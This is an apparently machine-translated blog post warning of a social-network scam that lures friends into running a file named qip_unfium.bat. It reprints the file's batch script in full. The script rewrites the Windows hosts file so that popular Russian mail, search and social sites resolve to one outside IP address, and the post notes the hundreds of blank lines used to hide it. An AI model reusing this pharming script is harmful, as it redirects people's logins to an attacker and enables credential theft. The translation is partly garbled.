12:37 Pharming in the Human Services networks | |
| It seems that the epidemic started in the next pharming through social networks. In one of the famous popular social networking sites (and maybe not in one?) Through a system of personal messages to friends send messages like this: I have not rabotaet fayl a desired, you can proverit at home? To that man, of course, receives a response: May, hi) And after some time you receive the following message: urlshort.me / ** fayl without oshibok zapuskaetsya?) ) (address covered by asterisks specifically to nepovadno to click:) As a man, taught by life experiences (including her), went on the link the browser in incognito mode. Condensed link leads to one of the popular sharing services, which offer a download qip_unfium.bat unsuspecting user clicks on this file in order to help a friend deal with the problem with It `Unfiumom, and ... the following code: @ rem ----- Exescript Options Begin ----- @ rem scriptType: console @ rem DestDirectory: temp @ rem Icon: default @ rem - --- Exescript Options End ----- @ echo off echo 81.94.229.115 www.mail.i.ua>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 mail.i.ua>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.m.vkontakte.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 m.vkontakte.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 mail.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.mail.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.yandex. ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 yandex.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.vkontakte.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 vkontakte.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.odnoklasniki.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 odnoklasniki.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.google.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 google.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.rambler.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 rambler.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 www.ya.ru>>% windir% \ system32 \ drivers \ etc \ hosts echo 81.94.229.115 ya.ru>> ;% windir% \ system32 \ drivers \ etc \ hosts By the way before the actual body of the script file 662 blank lines. The consequences of the implementation of this script can not mention. The moral? In the one hundred thousandth time to remind: beware of imitations and check with friends, and whether or not they send you a link. UPD on November 16, 2009: The second part Marlezonskogo ballet. :-) | |
|
| |
| Total comments: 0 | |